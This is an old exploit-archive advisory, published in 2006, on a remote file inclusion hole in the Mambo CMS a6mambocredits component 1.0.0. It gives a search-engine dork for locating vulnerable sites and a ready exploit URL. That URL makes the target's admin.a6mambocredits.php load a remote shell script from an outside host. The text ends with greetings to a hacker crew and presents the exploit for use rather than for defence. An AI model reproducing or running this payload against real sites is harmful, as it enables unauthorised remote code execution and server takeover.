Mambo a6mambocredits Component 1.0.0 File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo a6mambocredits Component 1.0.0 File Include Vulnerability
# Published : 2006-08-17
# Author : Cmaster4
# Previous Title : Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability
# Next Title : dotProject <= 2.0.4 (baseDir) Remote File Include Vulnerability

Title : Mambo a6mambocredits component v1.0.0 <== (mosConfig_live_site) Remote File Include Vulnerabilities

Affected Application: Mambo a6mambocredits component v1.0.0

(Mambo CMS Component)


. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


Discoverd/Found by: Charles Nelwan a.k.a Cmaster4

Team: #BatamHacker irc.dal.net crew

URL: http://www.batamhacker.info/forum

E-Mail: bugtraq_indo@yahoo.com


. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .


Typ: Remote [x] Local [ ]

Remote File Inclusion [x] SQL Injection [ ]

Level: Low [ ] Middle [x] High [ ]

Application: Mambo a6mambocredits

Version: 1.0.0

Vulnerable File: admin.a6mambocredits.php

URL: www.active6.com

Description: Mambo 4.5.1 component to display component credits in one central page.

google dork : inurl:"com_a6mambocredits"



. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt


Shoutz:
~~~~~~
~ Special Greetz To My BATAMHACKER CREW ON IRC.DAL.NET h4ntu, havicaz, baylaw
~ To All Indonesian Underground Hacker 

# www.Syue.com [2006-08-17]